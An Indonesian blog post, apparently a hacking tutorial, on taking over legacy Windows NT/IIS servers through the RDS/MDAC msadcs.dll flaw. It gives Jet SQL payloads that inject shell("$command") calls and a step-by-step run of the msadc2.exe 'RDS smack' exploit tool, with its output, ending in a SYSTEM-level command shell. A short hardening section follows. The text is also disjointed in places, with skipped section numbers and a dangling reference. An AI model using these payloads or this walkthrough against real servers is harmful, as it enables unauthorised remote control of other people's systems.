Tentu dengan maksud agar para administrator bisa lebih secure menjaga servernya dan juga sebagai sarana menyebarkan ilmu pengetahuan.Teknik hacking di NT sebenarnya bermacam-macam, diantaranya adalah:
I. Initial Access Strategy
- NETBIOS Shares using Microsoft Executables
- NAT The NetBios Auditing Tool
III. Frontpage Exploitation with Frontpage Extensions
IV. Registry Vulneralbility
- Gaining access to registry with the AT.EXE command (local)
- EGEDT32.EXE and REGEDIT.EXE
- REGINI.EXE and REGDMP.EXE remote registry editing tools
VI. SAM (Security Access Manager) Touching
VII. PWDump Technique
Dari teknik-teknik di atas yang menurut penulis paling menarik adalah teknik hacking melalui RDS (Remote Data Service). Teknik ini sebenarnya tidaklah baru karena beberapa hacker juga sudah familiar dengan cara ini, mungkin karena keberadaan unicode yang begitu banyak dan ampuhnya menghajar server-server NT (IIS 4.0/5.0) menyebabkan teknik ini tidak begitu populer. Di tulisan saya ini nanti saya juga akan mencoba menjelaskan bagaimana teknik pengamanannya.
Berbicara tentang RDS (Remote Data Service) tentu kita tidak akan bisa terlepas dengan induknya yaitu MDAC (Microsoft Data Access Components) dimana RDS adalah salah satu komponen dari MDAC. Perlu saya jelaskan sedikit tentang RDS (Remote Data Service). Jika Anda menginstall Windows NT 4.0 secara default aplikasi MDAC akan ikut terinstall. Windows NT 4.0 menggunakan MDAC versi 1.5. Berbicara tentang versi, ada dua versi MDAC yang vulnerable yaitu:
- MDAC versi 1.5
- MDAC versi 2.0
Tapi bagaimana cara mengeksekusi command tersebut?. Mungkin Anda pernah mendengar atau melihat satu file di NT yang bernama MSADCS.DLL dan di IIS Webserver, file ini di sertakan juga. Melalui file MSADCS.DLL atau yang dikenal sebagai ActiveDataFactory/AdvancedDataFactory kita bisa melakukan eksekusi empat command database yaitu:
Query
CreateRecordSet
ConvertToString
SubmitChanges
Tapi di sini kita hanya memerlukan dua buah command yaitu ‘QUERY’ dan ‘SUBMITCHANGES’. Kemudian kelebihan dari QUERY adalah kemampuannya untuk mengakses database di luar wilayahnya, intinya QUERY dapat memasukan informasi/data milik kita ke dalam databasenya. Contoh database yang di maksud adalah file ‘btcustmr.mdb’. Dengan menggunakan Microsoft Access Driver kita bisa meng-query ‘btcustmr.mdb’ dan membuat table yang berisi akses terhadap command shell. Contoh query
di bawah ini (not all showed!):
Select * from Customers where City='shell("$command")’
Create table ABC (B int, C varchar(10))
Select * from ABC where C='shell("$command")'
Oke sekarang kita akan mencoba mempraktikan konsep hacking di atas dengan bantuan satu script buatan Rain Forest Puppy (r.f.p) yang dalam pembuatannya dia di bantu oleh ADM dan Couple dari L0pt Security.
C:\> msadc2.exe
==========================================
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
-- Property Of Xnuxer Research, Schizoprenic --
Usage: msadc2.exe -h { -d -X -v }
- h = host you want to scan (ip or domain)
- d = delay between calls, default 1 second
- X = dump Index Server path table, if available
- N = query VbBusObj for NetBIOS name
- V = use VbBusObj instead of ActiveDataFactory
- v = verbose
- e = external dictionary file for step 5
-u & lt;\\host\share\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s = run only step
Or a -R will resume a (v2) command session
Cara kerja dari script ini adalah dengan melakukan checking terhadap file ‘msadcs.dll’ di target melalui port 80, kemudian jika di temukan di layar akan muncul tampilan seperti ini:
C:\> msadc2 –h 192.168.0.24
==========================================
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
-- Property Of Xnuxer Research, Schizoprenic --
Type the command line you want to run (cmd /c assumed):
cmd /c_
Jika file ‘msadcs.dll’ tidak di temukan maka yang muncul
adalah seperti di bawah ini:
C:\> msadc2 –h 192.168.0.21
==========================================
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
-- Property Of Xnuxer Research, Schizoprenic --
Doh! They're not running IIS.
Oke sekarang kita akan mencoba mengeksekusi command ‘dir’,
lihat contoh:
C:\> msadc2 –h 192.168.0.24
==========================================
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
-- Property Of Xnuxer Research, Schizoprenic --
Type the command line you want to run (cmd /c assumed): cmd /c dir
Step 1: Trying raw driver to btcustmr.mdb winnt -> c: Success!
Jika Anda berhasil maka beruntunglah Anda karena telah dapat menguasai system dan perlu di ketahui juga bahwa RDS running dengan authority SYSTEM jadi berhati-hatilah dengan command yang Anda pakai :) .
CARA MENGAMANKAN SYSTEM
Di rasa salah juga kalo saya tidak menyertakan cara mengamankan IIS server Anda dari teknik eksploitasi ini.
Langsung saja, ada beberapa langkah yang bisa Anda lakukan untuk mengantisipasi server Anda dari serangan hacker, cracker dan script kiddies melalui teknik ini, diantaranya adalah:
Cara cepat dan mudah adalah dengan menghapusseluruh file dan folder yang berada di directory C:\Program Files\Common Files\System\Msadc Men-disable RDS Support.
Menghapus Key Registry di bawah ini:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W3SVC\Parameters\ADCLaunch
Atau upgrade MDAC Anda ke versi 2.1, kemudian Jet Engine 3.5 ke versi 4.0
Jika empat hal di atas telah Anda lakukan maka amanlah server Anda dari eksploitasi ini. Mudah-mudahan sedikit tulisan ini bisa bermanfaat bagi Anda. Terima Kasih.
Anda di ijinkan menyebarluaskan informasi ini untuk di publikasikan di manapun juga asal tidak melakukan perubahan terhadap isi dan nama penulis dan juga asal untuk kepentingan penyebaran Ilmu Pengetahuan dan Pendidikan.
0 komentar:
Posting Komentar